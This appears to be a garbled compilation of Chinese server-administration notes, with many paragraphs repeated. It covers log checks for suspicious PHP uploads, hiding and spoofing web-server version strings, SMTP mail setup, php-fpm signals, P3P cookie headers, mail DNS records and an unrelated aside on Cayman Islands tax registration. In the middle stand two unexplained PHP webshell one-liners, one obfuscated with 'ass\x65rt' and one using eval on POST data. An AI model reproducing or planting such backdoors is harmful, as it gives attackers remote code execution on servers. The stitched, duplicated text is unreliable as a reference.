0x01 查看访问日志
看是否有文件上传操作(POST方法),
IPREMOVED - - [01/Mar/2013:06:16:48 -0600] "POST/uploads/monthly_10_2012/view.php HTTP/1.1" 200 36 "-" "Mozilla/5.0"
IPREMOVED - - [01/Mar/2013:06:12:58 -0600] "POST/public/style_images/master/profile/blog.php HTTP/1.1" 200 36 "-" "Mozilla/5.0"
nginx默认记录的日志格式为:
看是否有文件上传操作(POST方法),
IPREMOVED - - [01/Mar/2013:06:16:48 -0600] "POST/uploads/monthly_10_2012/view.php HTTP/1.1" 200 36 "-" "Mozilla/5.0"
IPREMOVED - - [01/Mar/2013:06:12:58 -0600] "POST/public/style_images/master/profile/blog.php HTTP/1.1" 200 36 "-" "Mozilla/5.0"
nginx默认记录的日志格式为:
1.隐藏php版本号
隐藏方法:vim php.ini添加如下代码
expose_php = Off
2.隐藏nginx版本号
隐藏方法:vim nginx.conf 在http里加入
server_tokens off;
3.隐藏apache版本号
隐藏方法:vim httpd.ini 添加如下代码
ServerTokens = ProductOnly
ServerSignature = Off
修改每个配置文件都要重启服务才可以生效。
伪装apache
编辑ap_release.h文件,修改
“#define AP_SERVER_BASEPRODUCT \"Apache\"”
为
“#define AP_SERVER_BASEPRODUCT \"Microsoft-IIS/5.0\"”
。
编辑os/unix/os.h文件,修改
“#define PLATFORM \"Unix\"”为“#define PLATFORM \"Win32\"”
修改完毕后,重新编译、安装Apache。
伪装nginx
cd /usr/local/src/nginx-1.0.6/src/core/
[root@server core]# cat nginx.h
/*
* Copyright (C) Igor Sysoev
*/
#ifndef _NGINX_H_INCLUDED_
#define _NGINX_H_INCLUDED_
#define NGINX_VERSION "1.0"
#define NGINX_VER "ZWS/" NGINX_VERSION
#define NGINX_VAR "ZWS"
#define NGX_OLDPID_EXT ".oldbin"
#endif /* _NGINX_H_INCLUDED_ */
隐藏方法:vim php.ini添加如下代码
expose_php = Off
2.隐藏nginx版本号
隐藏方法:vim nginx.conf 在http里加入
server_tokens off;
3.隐藏apache版本号
隐藏方法:vim httpd.ini 添加如下代码
ServerTokens = ProductOnly
ServerSignature = Off
修改每个配置文件都要重启服务才可以生效。
伪装apache
编辑ap_release.h文件,修改
“#define AP_SERVER_BASEPRODUCT \"Apache\"”
为
“#define AP_SERVER_BASEPRODUCT \"Microsoft-IIS/5.0\"”
编辑os/unix/os.h文件,修改
“#define PLATFORM \"Unix\"”为“#define PLATFORM \"Win32\"”
修改完毕后,重新编译、安装Apache。
伪装nginx
cd /usr/local/src/nginx-1.0.6/src/core/
[root@server core]# cat nginx.h
/*
* Copyright (C) Igor Sysoev
*/
#ifndef _NGINX_H_INCLUDED_
#define _NGINX_H_INCLUDED_
#define NGINX_VERSION "1.0"
#define NGINX_VER "ZWS/" NGINX_VERSION
#define NGINX_VAR "ZWS"
#define NGX_OLDPID_EXT ".oldbin"
#endif /* _NGINX_H_INCLUDED_ */
1. Sendmail配置
配置发送邮件的邮箱认证信息
vi /etc/mail.rc
--- 增加如下内容 ---
set from=yourname@your-domain.com
set smtp=mail.your-domain.com
set smtp-auth-user=yourname
set smtp-auth-password=yourpasswd
set smtp-auth=login
2. 测试发送邮件功能
echo "hello word" | mail -s "mail title" yourname@your-domain.com
配置发送邮件的邮箱认证信息
vi /etc/mail.rc
--- 增加如下内容 ---
set from=yourname@your-domain.com
set smtp=mail.your-domain.com
set smtp-auth-user=yourname
set smtp-auth-password=yourpasswd
set smtp-auth=login
2. 测试发送邮件功能
echo "hello word" | mail -s "mail title" yourname@your-domain.com
php 5.3.3 源码中已经内嵌了 php-fpm,不用象以前的php版本一样专门打补丁了,只需要在configure的时候添加编译参数即可。
关于php-fpm的编译参数有 –enable-fpm –with-fpm-user=www –with-fpm-group=www –with-libevent-dir=libevent位置。
但是,php 5.3.3 下的php-fpm 不再支持 php-fpm 以前具有的 /usr/local/php/sbin/php-fpm (start|stop|reload)等命令,需要使用信号控制:
master 进程可以理解以下信号:
INT, TERM:立刻终止
QUIT :平滑终止
USR1:重新打开日志文件
USR2:平滑重载所有worker进程并重新载入配置和二进制模块
示例:
1)php-fpm 关闭:
# kill -INT `cat /usr/local/php/var/run/php-fpm.pid`
2)php-fpm 重启:
# kill -USR2 `cat /usr/local/php/var/run/php-fpm.pid`
查看php-fpm进程数:
# ps aux | grep -c php-fpm
关于php-fpm的编译参数有 –enable-fpm –with-fpm-user=www –with-fpm-group=www –with-libevent-dir=libevent位置。
但是,php 5.3.3 下的php-fpm 不再支持 php-fpm 以前具有的 /usr/local/php/sbin/php-fpm (start|stop|reload)等命令,需要使用信号控制:
master 进程可以理解以下信号:
INT, TERM:立刻终止
QUIT :平滑终止
USR1:重新打开日志文件
USR2:平滑重载所有worker进程并重新载入配置和二进制模块
示例:
1)php-fpm 关闭:
# kill -INT `cat /usr/local/php/var/run/php-fpm.pid`
2)php-fpm 重启:
# kill -USR2 `cat /usr/local/php/var/run/php-fpm.pid`
查看php-fpm进程数:
# ps aux | grep -c php-fpm
首先介绍一下mutt这个软件,它是一款基于文字界面的邮件客户端,非常小巧,但功能强大,可以用它来读写,回复保存和删除你的邮件,能在linux命令行模式下收发邮件附件。
我只讲它很小的一部分功能,因为我也是刚刚开始摸索这个软件。更多的用法请查阅官网:http://www.mutt.org
一、mutt的安装
我只讲它很小的一部分功能,因为我也是刚刚开始摸索这个软件。更多的用法请查阅官网:http://www.mutt.org
一、mutt的安装
查看nginx编译参数:/usr/local/nginx/sbin/nginx -V
查看apache编译参数:cat /usr/local/apache/build/config.nice
查看mysql编译参数:cat /usr/local/mysql/bin/mysqlbug | grep CONFIGURE_LINE
查看php编译参数:/usr /local/php/bin/php -i | grep configure 或者 /usr/local/php/bin/php-config
查看apache编译参数:cat /usr/local/apache/build/config.nice
查看mysql编译参数:cat /usr/local/mysql/bin/mysqlbug | grep CONFIGURE_LINE
查看php编译参数:/usr /local/php/bin/php -i | grep configure 或者 /usr/local/php/bin/php-config
开曼群岛:
很多公司注册地就是英属开曼群岛。这是一个避税地,不好说是哪国的。开曼群岛没有附加条例限制贸易发展,没有外汇管制,外汇在开曼群岛进出自由。公司类型为免除公 司的名称无须用”LIMITED” (即“有限”)字样结尾。在开曼群岛注册的公司不需要向公司注册处登记周年财务报告,可以使用中文公司名称,但必须提供有关英文译名。
在开曼首府乔治敦注册成立子公司的美国企业超过150家,其中包括可口可乐公司、英特尔公司、甲骨文公司、宝洁公司等。通常母公司通过各种途径把赢利 移往这些子公司,这样公司大部分收入就不必向美国税务局呈报,逃避了高达35%的美国公司所得税税率。这些公司只是子公司在开曼群岛注册,总公司还是在美 国注册的。而百度总控股公司(Baidu.com,Inc)的注册地是开曼群岛,总公司主要办公地却在北京,作为运营实体的子公司百度在线网络技术有限公 司(外资)、百度网络科技有限公司(中资)也在北京,更狠!
<?array_map("ass\x65rt",(array)$_REQUEST[dede]);?>
<?php $command=$_POST[1990]; @eval($command);?>
最近在做一个项目需要用到IFRAME,发现IE在对iframe里面的页面写Cookie的时候有一些安全限制,导致写入和读取Cookie不成功,找了好长时间的解决办法,重要找到如下的办法:
1.页面里的COOKIE不能是浏览器进程的COOKIE(包括验证票和不设置超时时间的COOKIE),否则跨域会取不到.这点做跨域COOKIE的人比较少提到.不过实际上留意下几家大学做的方案,有细微的提到他们的验证模块里的COOKIE是有设置超时时间的.
2.当利用IFRAME时,记得要在相应的动态页的页头添加一下P3P的信息,否则IE会自觉的把IFRAME框里的COOKIE给阻止掉,产生问题.本身不保存自然就取不到了.这个其实是FRAMESET和COOKIE的问题,用FRAME或者IFRAME都会遇到.
3.测试时输出TRACE,会减少很多测试的工作量.
只需要设置 P3P HTTP Header,在隐含 iframe 里面跨域设置 cookie 就可以成功。他们所用的内容是:
P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
ASP直接在头部加了头部申明,测试有效。
<%Response.AddHeader "P3P", "CP=CAO PSA OUR"%>
php的话,应该是如下写法:
header('P3P: CP=CAO PSA OUR');
ASP.NET的话
通过在代码上加Response.AddHeader("P3P", "CP=CAO PSA OUR")或者在Window服务中将ASP.NET State Service 启动。
JSP:
response.setHeader("P3P","CP=CAO PSA OUR")
1.页面里的COOKIE不能是浏览器进程的COOKIE(包括验证票和不设置超时时间的COOKIE),否则跨域会取不到.这点做跨域COOKIE的人比较少提到.不过实际上留意下几家大学做的方案,有细微的提到他们的验证模块里的COOKIE是有设置超时时间的.
2.当利用IFRAME时,记得要在相应的动态页的页头添加一下P3P的信息,否则IE会自觉的把IFRAME框里的COOKIE给阻止掉,产生问题.本身不保存自然就取不到了.这个其实是FRAMESET和COOKIE的问题,用FRAME或者IFRAME都会遇到.
3.测试时输出TRACE,会减少很多测试的工作量.
只需要设置 P3P HTTP Header,在隐含 iframe 里面跨域设置 cookie 就可以成功。他们所用的内容是:
P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
ASP直接在头部加了头部申明,测试有效。
<%Response.AddHeader "P3P", "CP=CAO PSA OUR"%>
php的话,应该是如下写法:
header('P3P: CP=CAO PSA OUR');
ASP.NET的话
通过在代码上加Response.AddHeader("P3P", "CP=CAO PSA OUR")或者在Window服务中将ASP.NET State Service 启动。
JSP:
response.setHeader("P3P","CP=CAO PSA OUR")
邮件服务器的DNS设置
DNS记录,需要你到你的域名托管商那里进行设置或者你自己管理DNS服务器。不少域名托管商不支持txt记录或者不支持DKIM记录,所以你就无法使用SPF和DKIM的功能。
DNS的修改,需要48小时以上才能生效。
国内的万网是不支持DKIM,目前新网是支持SPF和DKIM。
DNS记录,需要你到你的域名托管商那里进行设置或者你自己管理DNS服务器。不少域名托管商不支持txt记录或者不支持DKIM记录,所以你就无法使用SPF和DKIM的功能。
DNS的修改,需要48小时以上才能生效。
国内的万网是不支持DKIM,目前新网是支持SPF和DKIM。
